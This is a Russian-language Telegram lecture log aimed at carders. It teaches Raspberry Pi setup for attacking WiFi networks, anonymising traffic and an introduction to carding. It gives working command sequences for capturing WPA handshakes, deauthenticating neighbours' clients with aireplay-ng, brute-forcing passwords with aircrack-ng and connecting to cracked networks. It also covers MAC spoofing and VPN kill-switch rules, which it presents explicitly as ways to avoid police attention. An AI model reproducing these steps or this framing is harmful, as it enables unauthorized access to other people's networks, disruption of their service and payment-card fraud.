Приветствую вас, дорогие друзья
На лекции мы поговрим о таком замечательном устройстве как Raspberry. Это миникомпьютер, который можно использовать абсолютно для разных целей: кардинг, безопасность, взлом WiFi, SSH, VPN, SOCKS... Я обучу вас настройке и использование этим чудо устройством под названием Raspberry. Он очень мобилен, его можно брать с собой практически везде, поместив его в карман своей куртки или рюкзака. А так же мы подробно поговорим об настройки ведра (андроида) под вбив (для кардеров), и разберем все нюансы касающиеся сс.
Темы лекции:На лекции мы поговрим о таком замечательном устройстве как Raspberry. Это миникомпьютер, который можно использовать абсолютно для разных целей: кардинг, безопасность, взлом WiFi, SSH, VPN, SOCKS... Я обучу вас настройке и использование этим чудо устройством под названием Raspberry. Он очень мобилен, его можно брать с собой практически везде, поместив его в карман своей куртки или рюкзака. А так же мы подробно поговорим об настройки ведра (андроида) под вбив (для кардеров), и разберем все нюансы касающиеся сс.
1. Запись образа, настройка и подключение через терминал по SSH.
2. Маленький FAQ по командам для терминала Raspberry.
3. Настройка Raspberry. Подробно и много.
4. Взлом WIFI. Подробно.
5. OPEN VPN. Настройка и подключение. Запрет трафика при обрыве.
6. PPTP. Скрипт от LimonCorp.
7. SOCKS4, SOCKS4a, SOCKS5, SOCKS5+.
8. SSH.
9. Ip Limon. Команды для чека IP адресов, в том числе и SOCKS.
10. Подмена MAC адреса на Raspberry
11. Картинг. Soft для телефона, использование и настройка. Подробно.
12. Мини лекция по сс (картам).
================================================================
Володя Путен, [09.09.19 12:33]
В сегодняшней лекции конкретика будет касаться безопасной и прекрасной работы с распбери
Володя Путен, [09.09.19 12:34]
купить девайс можно например здесь:
Володя Путен, [09.09.19 12:34]
или в рф на авито
Володя Путен, [09.09.19 12:34]
или в укр на олх
Володя Путен, [09.09.19 12:35]
На лекции мы поговрим о таком замечательном устройстве как Raspberry. Это миникомпьютер, который можно использовать абсолютно для разных целей: кардинг, безопасность, взлом WiFi, SSH, VPN, SOCKS... Я обучу вас настройке и использование этим чудо устройством под названием Raspberry. Он очень мобилен, его можно брать с собой практически везде, поместив его в карман своей куртки или рюкзака. А так же мы подробно поговорим об настройки ведра (андроида) под вбив (для кардеров), и разберем все нюансы касающиеся сс.
Володя Путен, [09.09.19 12:35]
Для тех кому интересны атаки на вайфай сети я советую приобрести адаптер и антену
Володя Путен, [09.09.19 12:35]
Адаптер:
Антены:
Володя Путен, [09.09.19 12:36]
Мои рекомендации по поводу адаптера и антены:
Адаптер:
Стоит заметить что текущий адаптер требует к себе две антены, это денежно затратно но оно того стоит
Антены советую брать эти, 2 шт:
Володя Путен, [09.09.19 12:36]
Позже мы поговорим более подробно на эту тему
Володя Путен, [09.09.19 12:36]
Итак, что же такое Raspberry:
Raspberry - это одноплатный миникомпьютер, чуть больше пачки сигарет, или совсем новые модели чуть больше пачки спичек. Их существует несолько видов, модель Zero, модели B/B+/2B/3B/3B+, модель A+/3A+.
Володя Путен, [09.09.19 12:36]
Состоит он из четырехслойной печатной платы, дополнительно к нему применяются блок питания, флэшка, корпус, а так же при необходимости и усиленная WIFI антена. Сегодня мы разберем пример работы данного устройства модели Raspberry Pi 3B+. Отличие это модели от ее предшественников является встроеный 64 битный процессор, а так же наличие собственного WIFI и Bluetooth. Как я выше уже упомянул, есть и более новые версии, в которых отличие это лишь компаткность (он размером с пачку спичек) а так же отсутствием некоторых выходов (-2 USB например). Хз надо вам эта инфа или нет, но вы читайте
Володя Путен, [09.09.19 12:36]
У Разбери есть своя ОС, основанная на UNIX системе DEBIAN, ну чем отличается тот же Windows от Linux, почему Linux безопасней, я рассказывать сегодня не буду. Так же на Raspberry можно установить и Kali Linux, возникший как результат слияния WHAX и Auditor Security Collection. Но сегодня мы тренируемся именно на образе предназначенному для этого миникомпьютера.
Володя Путен, [09.09.19 12:37]
Я заранее подготовил, скачал и установил этот образ, именно STREТCH версии, что значит "укрощенная", то есть без DESCTOP, без рабочего стола. Использовать для управления я буду лишь консоль (терминал).
Володя Путен, [09.09.19 12:37]
Необходимый софт на ноуте для записи Raspberry:
bitvise - через битвайс будем управлять малинкой.
Rufus - форматирование сд и запись
Advanced IP Scanner - сканер айпи.
2018-11-13-raspbian-stretch-full.img - образ линукса
Создать файл ssh без расширения в корне SD
Володя Путен, [09.09.19 12:37]
установка до воли простая, ничем не отличающаяся от установки других юникс систем.
Володя Путен, [09.09.19 12:37]
Вставляем сд в пк
Открываем Rufus, выбираем образ и нажимаем "Запись"
Все как обычно и ничего сложного.
Володя Путен, [09.09.19 12:37]
Дальше НЕОБХОДИМО ОБЯЗАТЕЛЬНО зайти на флэшку, и создать в корне СД файл под названием ssh , без разширения и пустой
Володя Путен, [09.09.19 12:37]
Он необходим нам для нальнейшего подключения к Распбери
Володя Путен, [09.09.19 12:37]
Извлекаем SD и вставляем в Raspberry, подключить LAN от Raspberry к роутеру и включить Raspberry.
Теперь нам необходимо узнать IP нашего Raspberry.
Есть два способа.
1. Узнать через админку в своем роуетере
2. Узнать с помощью Advanced IP Scanner
Володя Путен, [09.09.19 12:38]
Используем вариант №2.
Запускаем Advanced IP Scanner, пишем диапазон айпи адресов, например 192.168.0.1-254, и нажимаем Scan.
Володя Путен, [09.09.19 12:38]
Володя Путен, [09.09.19 12:38]
И вот наше Raspberry первое в списке, и его ип у меня 192.168.0.1.
Володя Путен, [09.09.19 12:38]
Так же можно подключиться напрямую к Raspberry по WIFI, но об этом мы поговорим потом, для начала нужно его настроить.
IP = 192.168.43.1 - если подключаться по WIFI напрямую
Port = 22
Володя Путен, [09.09.19 12:38]
На Raspberry по умолчанию логин: pi , пароль: raspberry, порт: 22
Володя Путен, [09.09.19 12:38]
Запускаем bitvise, вводим текущие данные доя подключения, и нажимаем LOGIN
Володя Путен, [09.09.19 12:39]
Володя Путен, [09.09.19 12:39]
Немножко теории при работе в терминале Linux. Мы будем использовать ряд команд, которые на первый взгляд кажутся сложными, не веселыми и не понятно будет, зачем я взял версию STREТCH без рабочего стола. Все просто - мобильность. Я же не буду с собой таскать монитор, например в дальних путешествиях. Я Raspberry бросил в карман и поехал. И при необходимости подключился к нему по WIFI с ноутбука или телефона, и сделал то что мне необходимо.
Володя Путен, [09.09.19 12:39]
Немного команд которые есть жизненно необходимыми. Запишите их себе сразу в блокнотик
Володя Путен, [09.09.19 12:39]
sudo - дает права администратора
apt-get - менеджер пакетов для линукса на базе debian
update - обновление
install - установка
cp - копирование файла или папки
mv - перемещение файла или папки
rm - удаление файла или папки
sudo -s - зайти в учетку как root (администратор)
nano - текстовый редактор в терминале, он умеет также создать новый файл, если его нет.
cat - почитать файл
ls - посмотреть что есть в папке
ifconfig - выводить активные сетевые интерфейсы (карты)
ifconfig -a - выводить все активные и неактивные интерфейсы.
iwconfig - вывод беспроводных интерфейсов.
/etc/ssh/sshd_config - это директория /папка/папка/файл.
Володя Путен, [09.09.19 12:39]
Горячие клавиш в Nano:
ctrl+O - сохранить файл. будет спрашивать сохранить ли, нажимать Enter
ctrl+X - выход из нано
ctrl+K - стереть строку
Володя Путен, [09.09.19 12:39]
Что бы вставить заранее скопированную строку/код/команду в терминале - один раз нажать правую кнопку мыши в терминале
Володя Путен, [09.09.19 12:40]
Пример как создать текстовый файл:
sudo nano text.txt
Почитать файл
sudo cat text.txt
Володя Путен, [09.09.19 12:40]
Первое что мы сделаем, это изменим порт для подключения.
Конфигурировать ssh на Raspberry, чтобы во время работы в bitvise связь не пропала и изменить стандартный порт 22 на другой например 2200
sudo nano /etc/ssh/sshd_config и добавить в конце файла коды
Володя Путен, [09.09.19 12:40]
Port 2200
ClientAliveInterval 300
ClientAliveCountMax 60
Володя Путен, [09.09.19 12:40]
Вставил, сохранил и вышел из нано.
Володя Путен, [09.09.19 12:40]
Далее пишем в терминале команду ifconfig
Эта команда означает "Показать сетевые интерфейсы"
Володя Путен, [09.09.19 12:40]
Володя Путен, [09.09.19 12:40]
Вот так они выглядят. на первый вид хаос полнейший
Володя Путен, [09.09.19 12:40]
Но ничего, со временем к этому привыкаешь быстро и на глаз становится все понятным
Володя Путен, [09.09.19 12:41]
eth0 - это LAN малинки
wlan0 - встроенный вифи малинки.
Когда подключите адаптер вифи к малинке, то появится имя wlan1.
Володя Путен, [09.09.19 12:41]
Что бы посмотреть ВСЕ доступные интерфейсы, добавьте к команде аргумент -а
sudo ifconfig -a
Володя Путен, [09.09.19 12:41]
Приступим к конфигурации. Она необходима будет для каждого. Сделал один раз и все.
Володя Путен, [09.09.19 12:42]
Конфигурируем interfaces
sudo nano /etc/network/interfaces
и добавить В КОНЦЕ конфига код:
Володя Путен, [09.09.19 12:42]
auto eth0
iface eth0 inet dhcp
allow-hotplug wlan0
iface wlan0 inet dhcp
#pre-up ifconfig wlan0 hw ether 00:00:00:00:00:00
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
auto wlan1
iface wlan1 inet manual
#pre-up ifconfig wlan1 hw ether b8:27:eb:00:00:00
auto br0
iface br0 inet static
address 192.168.44.1
netmask 255.255.255.0
bridge_ports wlan1
Володя Путен, [09.09.19 12:42]
Решетка на против строки обозначает "закомментрировать", то есть закомментрированная строка работать не будет. Что бы строка работала, ее необходимо раскомментировать, то есть убрать решетку. В данный момент оставляем все как есть.
Володя Путен, [09.09.19 12:43]
Дальше переходим к установке необходимых библиотек для работы hostapd, dnsmasq, bridge-utils
sudo apt-get install -y hostapd
sudo apt-get install -y bridge-utils dnsmasq
sudo nano /etc/hostapd/hostapd.conf
И вставить код
Володя Путен, [09.09.19 12:43]
ssid=WIFI_Limon
wpa_passphrase=12345432
interface=wlan1
bridge=br0
driver=nl80211
hw_mode=g
channel=6
ieee80211n=1
wmm_enabled=1
ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40]
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
Володя Путен, [09.09.19 12:43]
Я сначала распишу все что необходимо сделать а уже потом буду объяснять зачем это все
Володя Путен, [09.09.19 12:43]
Где
WIFI_Limon - название вашего WIFI, который будет раздаваться.
12345432 - пароль к вашему WIFI
Володя Путен, [09.09.19 12:43]
Включить автозагрузку нашей конфигурации
sudo sed -i /etc/default/hostapd -e '/DAEMON_CONF=/c DAEMON_CONF="/etc/hostapd/hostapd.conf"'
Володя Путен, [09.09.19 12:43]
Разрешить выдавать айпи интерфейсам для раздачи
sudo nano /etc/sysctl.conf
И добавить в конце конфига код
Володя Путен, [09.09.19 12:44]
### Controls IP packet forwarding ###
net.ipv4.ip_forward = 1
#net.ipv6.conf.all.forwarding = 1
### Deny IPv6 ###
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
### Deny input ICMP ###
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_echo_ignore_all = 1
### Controls the use of TCP syncookies ###
net.ipv4.tcp_syncookies = 1
### Turn on SYN-flood protections ###
net.ipv4.tcp_syn_retries = 5
net.ipv4.tcp_synack_retries = 5
Володя Путен, [09.09.19 12:44]
Конфигурация dnsmasq
Сначала удалим оригинальный конфиг:
sudo rm /etc/dnsmasq.conf
Володя Путен, [09.09.19 12:44]
И потом создадим новый:
sudo nano /etc/dnsmasq.conf
И добавить код:
Володя Путен, [09.09.19 12:44]
interface=br0
listen-address=192.168.44.1
bind-interfaces
domain-needed
bogus-priv
no-poll
no-resolv
server=8.8.8.8
stop-dns-rebind
clear-on-reload
dhcp-option=3,192.168.44.1
dhcp-option=6,192.168.44.1
dhcp-range=192.168.44.70,192.168.44.150,12h
dhcp-authoritative
Володя Путен, [09.09.19 12:44]
Теперь настроим фаервол.
iptables - пополярный фаерволл для Linux. Он есть во всех Linux системах.
Прописать три правила
Володя Путен, [09.09.19 12:44]
sudo iptables -t nat -A POSTROUTING -o wlan+ -j MASQUERADE
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -t nat -A POSTROUTING -o tun+ -j MASQUERADE
Володя Путен, [09.09.19 12:44]
При перезагрузке эти правила исчезнут, по этому нам необходимо установить библиотеку iptables-persistent что бы сохранить эти правила:
sudo apt-get install -y iptables-persistent
Володя Путен, [09.09.19 12:44]
При установке спросят сохранить ли правила для IPV4, нажимать ДА (YES), второй вопрос для IPV6, выбор YES или NO не имеет значения, так как IPV6 у нас все-равно отключен.
Володя Путен, [09.09.19 12:45]
Установка скриптов для работы IP SOCKS, тунелей и так далее.
Володя Путен, [09.09.19 12:45]
Сначала зайти в учетку root
sudo -s
sudo nano /etc/apt/sources.list
Володя Путен, [09.09.19 12:45]
Добавить строку:
deb kali-rolling main non-free contrib
Володя Путен, [09.09.19 12:45]
Нажать Ctrl+c
Володя Путен, [09.09.19 12:45]
Далее обновляемся:
sudo apt-get update
Володя Путен, [09.09.19 12:45]
Смотрим сетевые интерфейсы:
sudo ifconfig -a
Володя Путен, [09.09.19 12:45]
Устанавливаем библиотеку для работы с сетевым трафиком:
Володя Путен, [09.09.19 12:45]
sudo apt-get install aircrack-ng
Володя Путен, [09.09.19 12:46]
После окончания установки:
sudo nano /etc/apt/sources.list
И поставить решетку перед строкой: #deb kali-rolling main non-free contrib
Володя Путен, [09.09.19 12:46]
То есть закомментировать как я ранее говорил
Володя Путен, [09.09.19 12:46]
Нажать снова Ctrl+C
Володя Путен, [09.09.19 12:46]
Снова апдейтимся:
sudo apt-get update
Володя Путен, [09.09.19 12:46]
И дальше, для тех кто приобрел к примеру антены которые я советовал и адаптер Альфу, мы устанавливаем драйвера
Володя Путен, [09.09.19 12:46]
sudo apt-get install -y bc git dkms libncurses5-dev
Володя Путен, [09.09.19 12:46]
sudo wget "" -O /usr/bin/rpi-source
sudo chmod 755 /usr/bin/rpi-source
sudo rpi-source
git clone
cd rtl*
sudo sed -i 's/CONFIG_PLATFORM_I386_PC = y/CONFIG_PLATFORM_I386_PC = n/g' Makefile
sudo sed -i 's/CONFIG_PLATFORM_ARM_RPI = n/CONFIG_PLATFORM_ARM_RPI = y/g' Makefile
sudo ./dkms-install.sh
Володя Путен, [09.09.19 12:46]
Каждая команда начинается с новой строки
Володя Путен, [09.09.19 12:46]
После установки всего перезагружаем Raspberry
Володя Путен, [09.09.19 12:47]
Все, наш Raspberry настроен. Настроил WIFI, установил все необходимые библиотеки для работы, а так же весь необходимый софт, и соответственно установил драйвера для адаптера Alfa и подключил к нему аентены на 19DBI. Примерный радиус приема этих антен составляет 2-3км, но при отсутствии помех радиус может достигать 5ти километровэ
Володя Путен, [09.09.19 12:47]
Например я антены выставил за окно, но накрыл их типа мини крышей что бы на них влияло минимум погодных условий, хотя они предназначены для использования под открытым небом
Володя Путен, [09.09.19 12:47]
Если это тв квартире допустим то за окно можно не выставлять
Володя Путен, [09.09.19 12:47]
Немножко об оборудовании Alfa, которое я буду использовать
Володя Путен, [09.09.19 12:47]
В качестве примера я буду использовать:
Володя Путен, [09.09.19 12:47]
Антены, кол. 2 шт.: WI FI АНТЕННА ПАНЕЛЬНАЯ ALFA NETWORK APA-L2419 -19ДБ
Володя Путен, [09.09.19 12:47]
Адаптер, кол. 1 шт.: WI FI АДАПТЕР ALFA AWUS036ACH
Володя Путен, [09.09.19 12:47]
Вот тут внимание при покупке
Володя Путен, [09.09.19 12:47]
ИСКЛЮЧИТЕЛЬНО производство Тайвань. Компания Лондонская, но завод изготовитель находится в Тайване. На сегодняшний день продается слишком много подделок. По адаптеру, обязательно учитывать какой чипсет стоит в адаптере.
Володя Путен, [09.09.19 12:48]
Чипсет (касательно версии данного аппарата) должен быть RTL9912AU, технические характеристики данного оборудования вы можете найти в интеренете. Не всегда нужно брать две антены, если адаптер на один выход, то и антена необходима лишь одна. В данном адаптере необходимо две антены
Володя Путен, [09.09.19 12:48]
В РФ оригинальную Alfa можно купить по ссылкам:
Адаптер:
Антены:
Володя Путен, [09.09.19 12:48]
Для взлома WIFI сетей я установил AirCrack
Володя Путен, [09.09.19 12:48]
Начнем пожалуй именно с этого. Со взлома WIFI. Уверен что каждый из вас задавался вопросом, как же блин взломать вифи соседа когда у самого интернет не оплачен))))
Володя Путен, [09.09.19 12:48]
Есть разные способы взлома WIFI сетей, сегодня я опишу способ взлома посредством собирания хендшейков (handshake), это файл рукопожатия (синхранизации) между роутером и пользователем в момент авторизации
Володя Путен, [09.09.19 12:48]
Первое что необходимо сделать, это посмотреть, какой сетевой интерфейс у Alfa адаптера. Сделать это можно с помощью команды:
sudo airmon-ng
Володя Путен, [09.09.19 12:48]
Володя Путен, [09.09.19 12:48]
Итак, мы знаем что наш интерфейс это wlan1
Володя Путен, [09.09.19 12:49]
далее необходимо перевести его в режим мониторинга. Это можно сделать несколькими способами, да и собственно сам WIFI можно взламывать несколькими способами. Самый простой способ это:
sudo airmon-ng start wlan1
Володя Путен, [09.09.19 12:49]
Но мы же простых путей не ищем, правда? Пойдем другим способом с усилением сигнала антены
Володя Путен, [09.09.19 12:49]
Деактивировать Альфу
sudo ip link set wlan1 down
Володя Путен, [09.09.19 12:49]
Перевести в режим мониторинга
sudo iw dev wlan1 set type monitor
Володя Путен, [09.09.19 12:50]
Активировать Альфу:
sudo ip link set wlan1 up
Володя Путен, [09.09.19 12:50]
Усилить сигнал:
sudo iwconfig wlan1 txpower 30
Володя Путен, [09.09.19 12:51]
Смотреть доступные для атаки точки доступа
Sudo airodump-ng wlan1
Володя Путен, [09.09.19 12:51]
Я живу в дебрях, по этому у меня ближайший WIFI может быть в метрах 250, и так через каждые 250 метров по радиусу. По этому у меня не сильно много будет WIFI точек, но все же:
Володя Путен, [09.09.19 12:51]
Володя Путен, [09.09.19 12:51]
BSSID - это МАС адрес роутера
PWR- это сигнал
ENC -это тип сети
WPA2 - это сеть запароленная,
OPN соответственно незапароленная.
Сегодня мы разбираем взлом запароленых сетей.
ESSID - это название точки доступа.
CH - канал роутера
Володя Путен, [09.09.19 12:51]
В принципе это то что нас будет интересовать в данной таблице
Володя Путен, [09.09.19 12:51]
Когда определитесь с точкой доступа, которую будем атаковать, останавливаем мониторинг Ctrl+C
Володя Путен, [09.09.19 12:51]
Открываем новый терминал (этот не закрываем), и запускаем сбор хендшейков с определенного роутера:
sudo airodump-ng --bssid 24:65:C9:C1:B3:22 -c 7 -w WifiVasy wlan1
Володя Путен, [09.09.19 12:52]
24:65:C9:C1:B3:22 - MAC адрес роутера
-c 7 - канал роутера
-w WifiVasy - название файла в который будем записан hadshake.
Володя Путен, [09.09.19 12:52]
Володя Путен, [09.09.19 12:52]
1 и 2 - это MAC адрес роутера
3 - мак адрес клиента, подключенного к роутеру
4 - название точки доступа.
Володя Путен, [09.09.19 12:52]
Собирать хендшейки можно долго, но для увеличения скорости сбора придумали принудительную деактивацию клиента от роутера. Хендшейк ловится в момент подключения клиенита к роутеру. И для этого у нас есть все необходимое: роутер, клиент, raspberry
Володя Путен, [09.09.19 12:52]
Открываем ЕЩЕ один терминал, и в нем пишем команду:
sudo aireplay-ng -0 10 -a 24:65:C9:C1:B3:22 wlan1
Володя Путен, [09.09.19 12:52]
0 - означает деаунтефикация
10 - количество запросов на деактивацию
24:65:C9:C1:B3:22 - MAC адрес роутера
Володя Путен, [09.09.19 12:52]
Володя Путен, [09.09.19 12:53]
Вот так выглядит принудительная деаунтефикация клиента от роутера, простыми словами отключить соседа от его вайфая что бы он автоматически снова начал подключатьсяэ
Володя Путен, [09.09.19 12:53]
Итак, мы послали 10 запросов на деаунтефикацию клиентов от роутера. Это можно делать на определенного клиента, вот почему я выше подчеркнул, что у нас есть так же мак адрес клиента. Атака на определенного клиента-роутер можно осуществить следующей командой:
sudo aireplay-ng -0 10 -a 24:65:C9:C1:B3:22 -с 76:23:А4:S7:B8:98 wlan1
Володя Путен, [09.09.19 12:53]
Где -с 76:23:А4:S7:B8:98 - MAC адрес клиента
Володя Путен, [09.09.19 12:53]
В основном терминале (где вы писали команду sudo airodump-ng --bssid 24:65:C9:C1:B3:22 -c 7 -w WifiVasy wlan1) в правом верхнем углу появится надпись [WPA handshake: <MAC>], она говорит нам о том, что хендшейк уже захвачен (помйман)
Володя Путен, [09.09.19 12:53]
В дальнейшем я расскажу о другом способе сбора хендшейков с WIFi сетей, а так же о другом способе взлома, посредством сбора PMKID,в котором не нужно будет расшифровывать пароль. Ну всмысле когда нибудь расскажу
Володя Путен, [09.09.19 12:54]
А для тех кто хочет результат не меньше вышеописанный но не хочет ебаться со всем этим, аиркрек придумал автоматический сбор хэндштеков со всех точке доступа
Володя Путен, [09.09.19 12:54]
Автоматический сбор рукопожатий с помощью besside-ng
sudo besside-ng wlan1
Володя Путен, [09.09.19 12:55]
Перекур извините отъехать нужно срочно, через 40 минут продолжим.
Володя Путен, [09.09.19 12:55]
Вопросы сможете задать после лекции или в течении лекции если пожелаете
Володя Путен, [09.09.19 12:56]
Если у кого есть вопросы по текущему материалу - пишите. вернусь скоро и отвечу.
Володя Путен, [09.09.19 13:50]
Володя Путен, [09.09.19 13:50]
Мы остановились на сборе хэндшейков при взломе вифи
Володя Путен, [09.09.19 13:50]
Допустим мы поймали нужный хендшейк, заходим по SFTP на Raspberry, в корневую папку. Нас интересует файл с расширением .cap
Володя Путен, [09.09.19 13:51]
Володя Путен, [09.09.19 13:51]
О том как взламывать такие файлы по словарю я могу каждому индивидуально,если это будет кому интересно, это довольно трудоемкий процесс. Но для наглядности покажу примерный процесс чуть ниже
Володя Путен, [09.09.19 13:51]
Если у вас есть достойные словари по подбору пароля (в интернете их тысячи), то бросаем их в корень домашней директории, и вводим следующую команду:
aircrack-ng -w /home/pi/slovar.txt -e dlink WifiWasy.cap
Володя Путен, [09.09.19 13:51]
Где:
/home/pi/slovar.txt - путь к словарю
dlink - название точки доступа
WifiWasy.cap - название хендшейка, который мы поймали.
Володя Путен, [09.09.19 13:51]
Володя Путен, [09.09.19 13:51]
И вот так вот идет перебор пароля по словарю:
Володя Путен, [09.09.19 13:51]
Володя Путен, [09.09.19 13:52]
Естественно я заренее добавил в словарь гдето в середину пароль от WIFI, который я брутил, что бы показать вам как выглядит пойманный пароль к точке доступа. Словарь у меня был из 500 слов, мощность компьютера у меня никак не для брута (скорость брута зависит от мощности комрьютера, на достаточной мощности пароль перебирается по 300 тысяч слов в секунду, в моем случаи это примерно 170 слов в секунду), по этому у меня нашло пароль быстро, аж за 3 секунды
Володя Путен, [09.09.19 13:52]
Вот так вот выглядит сбрученный пароль:
Володя Путен, [09.09.19 13:52]
Володя Путен, [09.09.19 13:52]
Но есть сайты которые делают это все за вас, за небольшое приемлемое вознаграждение
Володя Путен, [09.09.19 13:52]
Например:
Сайт , брутят пароль быстро, у них очень хорошие мощностя.
Володя Путен, [09.09.19 13:53]
Вот как пример из ЛК кабинета этого сайта:
Володя Путен, [09.09.19 13:53]
Как видим, два пароля уже восстановлено, и еще один на второй странице, его не видно. То есть к троим соседям я уже могу подключиться
Володя Путен, [09.09.19 13:53]
По взлому WII закончим пожалуй, это была маленькая демонстрация во взлому соседей
Володя Путен, [09.09.19 13:53]
Допустим мы взломали пароль от соседа, сканируем сеть:
sudo iwlist wlan1 scan
Володя Путен, [09.09.19 13:53]
У нас будет информация такого вида:
Володя Путен, [09.09.19 13:53]
Нас интересует нужный нам ESSID и Adress, если вдруг вы его не записали ранее, хотя он так же есть в лк того сайта который расшифровал ваш пароль
Володя Путен, [09.09.19 13:54]
дальше заходим в конфигурационный файл:
Володя Путен, [09.09.19 13:54]
sudo nano /etc/wpa_supplicant/wpa_supplicant.conf
Володя Путен, [09.09.19 13:54]
И в самом низу вставляем код:
network={
ssid="The_ESSID_from_earlier"
psk="Your_wifi_password"
}
Володя Путен, [09.09.19 13:54]
И дальше:
sudo ifdown wlan1
sudo ifup wlan1
Володя Путен, [09.09.19 13:54]
Это мы типа выклбчили сетевой интерфейс и потом снова его включили, перезагрузили считайте без переагрузки Raspberry
Володя Путен, [09.09.19 13:54]
Все. Мы подключены. Проверить можно следующим образом:
Володя Путен, [09.09.19 13:54]
sudo iwconfig
Володя Путен, [09.09.19 13:54]
iFconfog - посмотреть сетевые интерфейсы, а iWconfig посмотреть АКТИВНЫЕ сетевые интерфейсы
Володя Путен, [09.09.19 13:55]
Володя Путен, [09.09.19 13:55]
Соответственно в зарисованны мною местах будет название точки доступа и мак адрес. В случаи если подключение не удалось - название точки доступа и мак будут отсутствовать
Володя Путен, [09.09.19 13:55]
теперь разберем одну из основных я считаю функций. Это VPN. Основная она потому, что это наша безопасность. Про носки (соксы) мы поговорим потом, натягивать мы их будем поверх VPN
Володя Путен, [09.09.19 13:55]
Следующие скрипты являются собственной разработкой, потому они входят как комплект для личного пользования при индивидуальной разработке. Все это можно настроить и установить самому из источников в интернете в случаи необходимости, я же скриптами лишь упростил пользование этим всем наобором софта, для мобильного использования и переключения.
Володя Путен, [09.09.19 13:56]
Интерфейс VPN у Raspberry называется Tun+
Володя Путен, [09.09.19 13:56]
Есть два типа VPN. С авторизацией и без. Естесевнно у большинства покупные VPN и они обязательно идут с авторизацией. Вот их и разберем. С конфигами без авторизации все просто, если у конфига нет авторизации то делать второй пункт ниже не нужно
Володя Путен, [09.09.19 13:56]
Первое что необходимо сделать, это изменить расширение .ovpn на .conf . Можно скоратить имя. Допустим у меня VPN конфиг под названием limonvpn.conf
Володя Путен, [09.09.19 13:56]
Второе: открыть файл как редактор и найти auth-user-pass и дописать /etc/openvpn/login, то есть должно получится так:
auth-user-pass /etc/openvpn/login
Володя Путен, [09.09.19 13:56]
Третье: создать файл login (без расширения) и прописать в нем:
login
password
Володя Путен, [09.09.19 13:56]
Где login и password - вводить логин и пароль от VPN. Сохранить.
Володя Путен, [09.09.19 13:56]
Четвертое: отправить два файла на Raspberry в домашнюю папку /home/pi с помощью SFTP в Bitvise.
Володя Путен, [09.09.19 13:56]
пятое: теперь необходимо их переместить из домашней директории в другую папку /etc/openvpn . Вспоминаем команды в самом начале которые я давал как FAQ
Володя Путен, [09.09.19 13:56]
sudo mv [откуда] [куда]
sudo mv limonvpn.conf /etc/openvpn/
sudo mv login /etc/openvpn/
Володя Путен, [09.09.19 13:56]
Все. VPN готов.
FAQ для использования:
Володя Путен, [09.09.19 13:57]
OpenVPN
====================
sudo systemctl start openvpn - подключиться к впн
sudo systemctl stop openvpn - отключиться
sudo systemctl restart openvpn - рестарт
sudo systemctl enable openvpn - включить автозагрузку
sudo systemctl disable openvpn - убрать из автозагрузки
Володя Путен, [09.09.19 13:57]
Если в папке /etc/openvpn/ много конфигов - выбрать один конфиг для подключения:
sudo nano /etc/default/openvpn и найти AUTOSTART="name" и расскоментировать и дописать имя конфига без расширения.
Володя Путен, [09.09.19 13:57]
Часто задаются вопросом, можно ли запретить трафик при обрыве VPN, что бы не спалить случайно свой IP или IP своего соседа, к которому потом наведуются люди в синей форме
Володя Путен, [09.09.19 13:57]
Запретить трафик при обрыве VPN.
Добавить правила
sudo iptables -A INPUT -i tun+ -j ACCEPT
sudo iptables -A OUTPUT -o tun+ -j ACCEPT
После изменения фаерволла сохранить правила
sudo netfilter-persistent save
Володя Путен, [09.09.19 13:57]
Удалить правила
sudo iptables -D INPUT -i tun+ -j ACCEPT
sudo iptables -D OUTPUT -o tun+ -j ACCEPT
После изменения фаерволла сохранить правила
sudo netfilter-persistent save
Володя Путен, [09.09.19 13:57]
то же касается остальных скриптов, а это PPTP, SOCKS. SSH, IP CHECK, то для них просто FAQ по использованию, настройкам они не подлежат:
Володя Путен, [09.09.19 13:58]
PPTP Limon
====================
sudo limonpptp pon [IP] [логин] [пароль] - подключиться к PPTP
sudo limonpptp -s - отсоединить
sudo limonpptp stop - отсоединить
sudo limonpptp poff - отсоединить
SOCKS Limon - подключение к proxy
===================
sudo limonsocks [тип] [IP] [порт] - прокси без авторизации
sudo limonsocks [тип] [IP] [порт] [логин] [пароль] - прокси с авторизацией
Изменить DNS - после слова limonsocks добавить аргумент -d [IP-DNS]
sudo limonsocks -s - отсоединить
sudo limonsocks stop - отсоединить
SSH Limon - подключение к SSH
===================
sudo limonssh [логин]@[IP] - подключиться к SSH (по умолчанию порт 22)
sudo limonssh [логин]@[IP]:[порт] - если у SSH другой порт, то вводить порт
Изменить DNS - после слова limonssh добавить аргумент -d [IP-DNS]
Ctrl+C - отсоединить
- Выбрать любую страну DNS
IP Limon - чек IP
====================
sudo limonip ip - мой ip
sudo limonip ip [IP] - другой IP/DNS
sudo limonip http [IP] [порт] - HTTP/S
sudo limonip http+ [IP] [порт] [логин] [пароль] - HTTP/S с авторизацией
sudo limonip socks4 [IP] [порт] - SOCKS4
sudo limonip socks4a [IP] [порт] - SOCKS4a
sudo limonip socks5 [IP] [порт] - SOCKS5
sudo limonip socks5+ [IP] [порт] [логин] [пароль] - SOCKS5 с авторизацией
Изменить основной DNS
===================
sudo limondns [IP-DNS]
Володя Путен, [09.09.19 13:58]
Многие так же задаются вопросом, можно ли менять МАС адрес на Raspbery - ответ: МОЖНО
Володя Путен, [09.09.19 13:58]
Подмена MAC
===================
sudo nano /etc/network/interfaces и расскоментировать (убрать решетку #)
----------------
#pre-up ifconfig ИНТЕРФЕЙС hw ether 00:00:00:00:00:00
----------------
Чтобы изменение применялось, перезагрузить малинку:
sudo reboot
Володя Путен, [09.09.19 13:58]
Если есть те кто еще не сильно знаком с кардингом. то разберем что такое сс, с чем его едят и как оно выглядит
Володя Путен, [09.09.19 13:58]
Что такое кредитная карта? Думаю, всем очевиден этот вопрос. Это карта с магнитной лентой и чипом, на котором хранится информация о состоянии нашего денежного баланса и тд
Володя Путен, [09.09.19 13:58]
С помощью магнитных лент и чипов мы расплачиваемся в магазинах, снимаем деньги в банкоматах, на карте так же отчеканы данные.
Володя Путен, [09.09.19 13:58]
Эти данные используются для осуществления онлайн покупок в интеренте
